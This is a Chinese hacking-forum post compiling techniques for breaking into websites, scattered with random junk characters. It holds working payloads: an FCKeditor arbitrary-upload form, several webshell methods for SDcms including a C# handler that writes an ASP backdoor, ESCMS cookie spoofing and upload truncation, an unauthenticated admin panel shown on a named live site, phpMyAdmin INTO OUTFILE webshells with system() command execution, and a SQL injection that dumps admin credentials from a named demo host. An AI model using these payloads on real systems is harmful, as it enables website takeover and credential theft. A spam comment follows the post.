http://xxoo.com/controls/fckedit ... aspx/connector.aspx  r( D& R$ O  X: i5 k" }
跳转到网站根目录上传任意文件。' L' R* ?2 W" w& t2 Z
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
# `* s* Z9 Q  P' W' E1 {<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">$ P7 W( r+ N! N2 o
Upload a new file:<br>; z( F1 f+ J3 j) s
<input type="file" name="NewFile" size="50"><br>6 x( A2 h% L: e- |
<input id="btnUpload" type="submit" value="Upload">
% P: W4 |! F4 g</form>; @1 ^  g; T7 D; g
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 \# S4 s7 t1 O! j8 o7 h7 T% E; h8 @9 f8 c  T, j' l0 i( u; Z
SDcms 后台拿webshell" ^9 A( J' ^/ M* a) `) T

5 h8 |. c: z- g4 Z" G0 M9 A3 G! M第一种方法:
( {, P4 f2 x- u* V, Z进入后台-->系统管理-->系统设置-->系统设置->网站名称;
$ q6 `( _1 ?  u1 V( n1 j把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
0 V! S/ _1 F% E- o- l0 u用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。2 i9 r  X7 f6 F5 l
第二种方法:  W7 s& w3 e4 x7 r3 z0 D: M
进入后台-->系统管理-->系统设置-->系统设置->上传设置;* r$ C- f' m8 I8 T; x
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!( {! I: V% ?! Z2 W$ }
第三种方法:
; k& s% K6 \8 [+ y: r' X6 S进入后台-->界面管理-->模板文件管理-->创建文件
: r& y1 n0 C, {' C文件名写入getshell.ashx) S4 W+ F" ?% `% E
内容写入下面内容:
. u6 o: U3 u( N/ a& G/====================复制下面的=========================/1 G0 G& G7 Y* [3 J2 E6 u7 S% J
<%@ WebHandler Language="C#" Class="Handler" %>4 N, l) n/ H4 p
using System;3 n1 a% K5 L0 ?6 A0 Y" z$ T  F
using System.Web;  f: }; }- d7 ~9 d/ _3 X# z6 @
using System.IO;7 M6 k1 l% |- r; U: {- H
public class Handler : IHttpHandler {
2 ?: E. B2 x8 Y' @public void ProcessRequest (HttpContext context) {1 H- W" n& C8 j! H
context.Response.ContentType = "text/plain";
( Y( Z. ^+ D9 i8 M, t. l4 mStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));8 o% @% w/ z; p) |
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");. o$ [$ n9 y. j2 Y0 W7 r
file1.Flush();
- Q+ O: D* r& }; @4 F2 Tfile1.Close();0 E9 _6 s2 h7 c9 ?* E7 c, E
}
& X* W$ A  Z1 n5 w/ l: V+ tpublic bool IsReusable {$ t6 ^* t3 N, l7 _
get {5 R" U' T  [8 T8 E3 k4 G  f0 w
return false;! J1 n- K, b2 H4 S! @; V" j
}% x( \9 Y0 ~8 V. y4 _- w
}
! @( A  n2 W0 K' K: {, o}
' t) V' \7 n7 G) q7 x: X' L' e/=============================================/) W& o( A. s. V/ y* i6 L
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx1 Y. j% j# h# Z! Z3 C# A) D
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接( `+ @; P! \" q9 {% @7 p7 e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: ]1 W. K+ h: N9 q# l$ [+ ^0 |, E+ u
" j. M# g( A' J. u
ESCMS网站管理系统0day
+ V: ^8 G' T; i( H6 ^7 }# h
$ }2 e4 S% n1 d, U& t. Q后台登陆验证是通过admin/check.asp实现的7 }' w: t3 U' L! e9 K0 k0 |% m

& y5 Y2 I& s, T& `: @首先我们打开http://target.com/admin/es_index.html# Y' x8 u, n2 y# e
然后在COOKIE结尾加上
4 [! e1 v4 q1 h* ?' V9 [6 `% H' {; ESCMS$_SP2=ES_admin=st0p;+ F7 M9 `, C" P' p' s
修改,然后刷新0 ]/ l& B% d) f3 j! @+ h' x1 I# `
进后台了嘎..2 G" Q; j. ?  W& L9 M* ^1 y) `
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
: O- s" r; w; L% q3 e3 E- a. |6 h6 Q4 f3 B9 m! l  M( N& j
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
' l. W' ?( h3 ?8 M* ~嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp: C8 _) @+ C  X9 B: R
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..! t+ a$ T7 z# `* I9 s
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了' i8 E% r1 P3 O. S
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 P0 t/ S  N1 N% T1 Z4 y( [( C3 B$ {0 T4 b$ X
宁志网站管理系统后台无验证漏洞及修复
  ^9 D+ }3 ~5 Q* y
- Y2 z/ \& \! T6 C, [% U网上搜了一下,好像没有发布.如有雷同纯粹巧合!* a( U, P# m9 x
官方网站:www.ningzhi.net. F" h/ }* z1 C) x9 ?$ g* |
学校网站管理系统 V.2011版本
. ]. p8 R9 @# S1 D2 U' R6 O( Ihttp://down.chinaz.com/soft/29943.htm
2 o( `3 G: L8 H/ V其它版本(如:政府版等),自行下载.
. ^- P5 z9 h+ O; M漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~4 Y0 D! k0 o- o; l. L) H- T" Q
login.asp代码如下:
0 @, n  c: J& h- j<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 9 q5 [3 S& H8 E2 G
manage.asp代码我就不帖出来了.反正也没验证.( z( u9 `/ ?$ X4 y: E3 q  l5 q
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
7 b" W% J6 g8 |& v- n漏洞利用:, Q' ~  l. w8 Y/ S! q' N
直接访问http://www.0855.tv/admin/manage.asp
. H# p( W! J* i" F$ U5 D数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
: U% O. {, K- ?* C$ i: z0 u- T----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ r0 t! w. S+ e# B0 ~; V$ R2 g% B$ y

) ~" n: p; V$ {" c' R' Pphpmyadmin拿shell的四种方法总结及修复1 a; ~& ]' s4 e1 w) P6 Y! T

( M" {; ?, r* e* X方法一:
1 L& X( v+ n2 J( {3 r( vCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );8 N9 g0 T! r" O
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');5 V/ g1 ]* h% K; g' a
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
7 w6 o& r/ z" e/ }9 B6 k----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php: X$ v4 S! [* r. n7 Y
    一句话连接密码:7on
4 U: E6 k" B- l* y, ~. k; z方法二:; t6 ~% p' q0 V2 {: I. I& Q& d8 V
读取文件内容:    select load_file('E:/xamp/www/s.php');
3 R" f' Y& Z$ A6 U) E0 L# j; l3 g写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
. b% d' O; x: H( ]* d2 h. icmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'0 o  ?" S8 J6 ]: c
方法三:4 D/ H$ O8 Q3 i0 l" ~
JhackJ版本 PHPmyadmin拿shell+ r  X! D2 h# x; U9 V% t
Create TABLE study (cmd text NOT NULL);" Q( E6 p3 X6 H) k8 D6 B7 `
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
& p+ x! l2 m# j* b( c' s: uselect cmd from study into outfile 'E:/wamp/www/7.php';" Y* K0 }4 ~+ d; i8 G
Drop TABLE IF EXISTS study;
& b7 h8 A+ f- h<?php eval($_POST[cmd])?>
. b( _% ]6 ]6 V( x( `* ACREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。7 z( L" k. d% N' l3 [
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 11 ?# ^% L5 i* H
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 16 W/ b* H& B1 w( S
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
1 B5 J) l; m, i+ M. b方法四:9 [+ i: s! u9 L: h5 t, c4 B
select load_file('E:/xamp/www/study.php');9 l7 h2 e: T& @  n
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
* Y$ n5 R, k+ j7 _7 A9 I! a. ^然后访问网站目录:http://www.2cto.com/study.php?cmd=dir1 V7 q' d$ j7 S" T1 z) u% @& u
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------! `3 [* ~6 w! s! u3 g2 j) h
9 z5 _# s  m2 t- p7 s; u% y
NO.001中学网站管理系统 Build 110628 注入漏洞& K  n) K2 @9 T0 f5 h1 a) t

3 f6 y* r7 K# d& y4 rNO.001中学网站管理系统功能模块:1 L% W2 o  a, f4 R5 z6 ~  W* ?
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等( e5 k$ \+ O+ b; W
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
1 b7 f% n- v4 S5 K# S2 L3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
7 t; k' a1 C- N5 ?& P& a% y, W4.视频图片管理:一级分类,动态添加视频或者图片等信息
  O) l# T: x6 N' o4 y5.留言管理:对留言,修改,删除、回复等管理
% M2 ]+ N; W1 A! g* d6.校友频道:包括校友资料excel导出、管理等功能
, l" v/ X. \, L7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页: \0 y3 C" |% b. l; z* w
默认后台:admin/login.asp5 F0 g1 M) e$ P
官方演示:http://demo.001cms.net; I8 O: O2 V2 {! u6 u
源码下载地址:http://down.chinaz.com/soft/30187.htm/ s) z* y  _- ?; y6 n
EXP:
. N; ?1 C$ i7 r7 A4 B* g4 Gunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin; O, _! x4 ]% ~8 T3 D* |7 s- [
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ O) X* U& P, n8 k, g" u% K" Lgetshell:后台有备份,你懂的( ?0 Z' B8 z( p; {- n
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
2 s7 ^0 h; t6 _/ O* J& w-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表